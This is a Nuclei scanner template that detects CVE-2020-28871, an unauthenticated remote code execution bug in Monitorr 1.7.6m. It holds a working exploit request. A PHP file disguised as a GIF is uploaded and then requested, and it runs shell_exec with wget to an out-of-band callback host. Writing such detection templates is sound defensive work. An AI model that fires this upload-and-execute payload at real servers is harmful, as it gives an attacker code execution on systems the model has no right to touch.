nuclei-templates/cves/2020/CVE-2020-28871.yaml

45 lines
1.8 KiB
YAML

id: CVE-2020-28871
info:
name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-28871
- https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
- https://www.exploit-db.com/exploits/48980
tags: cve,cve2020,monitorr,rce,oob
requests:
- raw:
- |
POST /assets/php/upload.php HTTP/1.1
Host: {{Hostname}}
Accept-Encoding: gzip, deflate
Accept: text/plain, */*; q=0.01
Connection: close
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745
Origin: http://{{Hostname}}
Referer: http://{{Hostname}}
-----------------------------31046105003900160576454225745
Content-Disposition: form-data; name="fileToUpload"; filename="{{randstr}}.php"
Content-Type: image/gif
GIF89a213213123<?php shell_exec("wget -c http://{{interactsh-url}}");
-----------------------------31046105003900160576454225745--
- |
GET /assets/data/usrimg/{{tolower("{{randstr}}.php")}} HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"